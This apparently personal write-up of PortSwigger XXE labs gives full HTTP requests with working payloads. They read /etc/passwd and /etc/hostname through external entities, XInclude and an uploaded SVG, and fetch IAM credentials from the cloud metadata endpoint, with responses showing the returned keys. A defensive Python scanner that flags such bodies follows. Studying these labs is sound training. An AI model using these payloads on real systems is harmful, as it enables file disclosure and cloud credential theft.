XXE Labs Overview
XXE Labs
Solution for some Labs
For this lab we just had to add a DOCTYPE element declaring an external entity to the XML request:
POST /product/stock HTTP/1.1
Host: ac471fa01e24fa45c1da07e500c70073.web-security-academy.net
Cookie: session=dHC3Eadta5BLBVZn5ncUNmfdh4NS6XKq
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://ac471fa01e24fa45c1da07e500c70073.web-security-academy.net/product?productId=1
Content-Type: application/xml
Origin: https://ac471fa01e24fa45c1da07e500c70073.web-security-academy.net
Content-Length: 179
Te: trailers
Connection: close
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE whatwhat [ <!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>
The request is:
POST /product/stock HTTP/1.1
Host: ac491fc11faf9821c096360700b50035.web-security-academy.net
Cookie: session=MVs1UcQIMuZIaxaMlk8T8VBGwYlvIgDR
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://ac491fc11faf9821c096360700b50035.web-security-academy.net/product?productId=1
Content-Type: application/xml
Origin: https://ac491fc11faf9821c096360700b50035.web-security-academy.net
Content-Length: 237
Te: trailers
Connection: close
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE whatwhat [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin">]>
<stockCheck><productId>&xxe;</productId><storeId>&xxe;</storeId></stockCheck>
The response is:
HTTP/1.1 400 Bad Request
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 553
"Invalid product ID:
{
"Code" : "Success",
"LastUpdated" : "2021-12-02T03:56:59.596734488Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "lmepP7PiMtM3VPnJdRJQ",
"SecretAccessKey" : "DmMcGZmJPwlQAVUMkyxpjCLctv15xEq8zKgk5UpE",
"Token" : "ZdIOYPHVyDE7k8hVfzDv9oGRvJ4Slkt5grwuEKPih1Ot3ZPYrV1rwj5lSQBVd1dZOqVSed2pj3XCB3msq5l0kSqaGOEjqyue57kCL4TRDZiRcdfYzwml7WN5k3aP3LlqOQh9Z2uaFQGwRLE3AmNTgsg19X4Ko6uG2bZgjRNopyTZ0BiTkj3fMTbMMXcJsJnkgvkMBuy23Hm8fNislMYQ4R7tM8sp3ta37bP1LNWaY93QFAloNN0VxlP9Y8aAm2W9",
"Expiration" : "2027-12-01T03:56:59.596734488Z"
}"
How did we know which parameter to pollute?
When I replaced the value 1 of productId with <xml>, the response was:
HTTP/1.1 400 Bad Request
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 118
"XML parser exited with non-zero code 1: The element type xml must be terminated by the matching end-tag </xml>.
"
Solution
Request
POST /product/stock HTTP/1.1
Host: ac431f4c1f6aa87ac09212a3007f008c.web-security-academy.net
Cookie: session=lx5TIipReFwKd43FLC8Q0xg8clcQtmG1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://ac431f4c1f6aa87ac09212a3007f008c.web-security-academy.net/product?productId=1
Content-Type: application/x-www-form-urlencoded
Origin: https://ac431f4c1f6aa87ac09212a3007f008c.web-security-academy.net
Content-Length: 128
Te: trailers
Connection: close
productId=<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>&storeId=1
Response
HTTP/1.1 400 Bad Request
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 1229
"Invalid product ID:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...
"
Here the lab description tells us that the backend uses the Apache Batik library for image processing, so I searched for known vulnerabilities in Batik. I was able to find a report on the vulnerability, along with the payload used here.
The SVG file payload we created is:
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="1000px" height="1000px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-family="Verdana" font-size="100px" x="100" y="400">&xxe;</text></svg>
The request is:
POST /post/comment HTTP/1.1
Host: ac571f961eb53715c0de5e2b00460064.web-security-academy.net
Cookie: session=Yuf0K6BH4jteoqJeKkeYM6dQDPfDmkij
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://ac571f961eb53715c0de5e2b00460064.web-security-academy.net/post?postId=5
Content-Type: multipart/form-data; boundary=---------------------------4953441272046910820874195104
Content-Length: 1271
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close
-----------------------------4953441272046910820874195104
Content-Disposition: form-data; name="csrf"
zhbpSJRCY0UdwysJFDOPr0yBRIVw5QSB
-----------------------------4953441272046910820874195104
Content-Disposition: form-data; name="postId"
5
-----------------------------4953441272046910820874195104
Content-Disposition: form-data; name="comment"
test
-----------------------------4953441272046910820874195104
Content-Disposition: form-data; name="name"
test
-----------------------------4953441272046910820874195104
Content-Disposition: form-data; name="avatar"; filename="test_image.svg"
Content-Type: image/svg+xml
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="1000px" height="1000px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-family="Verdana" font-size="100px" x="100" y="400">&xxe;</text></svg>
-----------------------------4953441272046910820874195104
Content-Disposition: form-data; name="email"
test@test.com
-----------------------------4953441272046910820874195104
Content-Disposition: form-data; name="website"
http://www.test.com
-----------------------------4953441272046910820874195104--
The resulting image, which can be downloaded, contains the desired hostname.
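All three labs above succeed because the server hands attacker-controlled XML to a parser that honours DOCTYPE entity declarations or XInclude. As an added example (not code from the labs or from PortSwigger), this scanner uses Python's stdlib expat parser to flag a body before the real parser sees it: it records DOCTYPE declarations, SYSTEM/PUBLIC entities and xi:include elements without ever fetching anything. The sample bodies are constructed to match the shape of the lab requests; the hypothetical stock-check handler would reject any body that returns findings.

```python
import xml.parsers.expat as expat

XINCLUDE_NS = "http://www.w3.org/2001/XInclude"
# Constructed sample bodies, shaped like the lab requests above.
ENTITY_BODY = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<!DOCTYPE whatwhat [ <!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    '<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>'
)
XINCLUDE_BODY = (
    '<stockCheck><productId><foo xmlns:xi="http://www.w3.org/2001/XInclude">'
    '<xi:include parse="text" href="file:///etc/passwd"/></foo></productId>'
    '<storeId>1</storeId></stockCheck>'
)
BENIGN_BODY = "<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>"


def xxe_findings(body):
    """Scan an XML body with expat without resolving anything, and return
    the reasons it should be rejected before the real parser sees it."""
    findings = []
    parser = expat.ParserCreate(namespace_separator=" ")

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # No DOCTYPE belongs in an API request body; an external DTD even less.
        findings.append("doctype:%s" % name)
        if sysid:
            findings.append("external-dtd:%s" % sysid)

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        if sysid is not None or pubid is not None:  # SYSTEM/PUBLIC entity
            findings.append("external-entity:%s:%s" % (name, sysid))

    def on_ext_ref(context, base, sysid, pubid):
        findings.append("entity-ref:%s" % sysid)
        return 1  # report it as handled so expat continues; never fetch it

    def on_start(name, attrs):
        # With namespace processing the tag arrives as "<uri> <local-name>".
        if name == XINCLUDE_NS + " include":
            findings.append("xinclude:%s" % attrs.get("href"))

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.ExternalEntityRefHandler = on_ext_ref
    parser.StartElementHandler = on_start
    try:
        parser.Parse(body, True)
    except expat.ExpatError as err:
        findings.append("malformed:%s" % err)  # reject unparseable input too
    return findings
```

The scanner is a gate, not a replacement for a hardened parser: the real fix is still to disable DTD processing and XInclude in whatever library renders the stock check or the SVG.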
BLIND XXE REMAINS
Theory and labs at https://portswigger.net/web-security/xxe/blind. These labs require Burp Collaborator, as they all involve out-of-band interaction. Need to buy Burp Pro 😔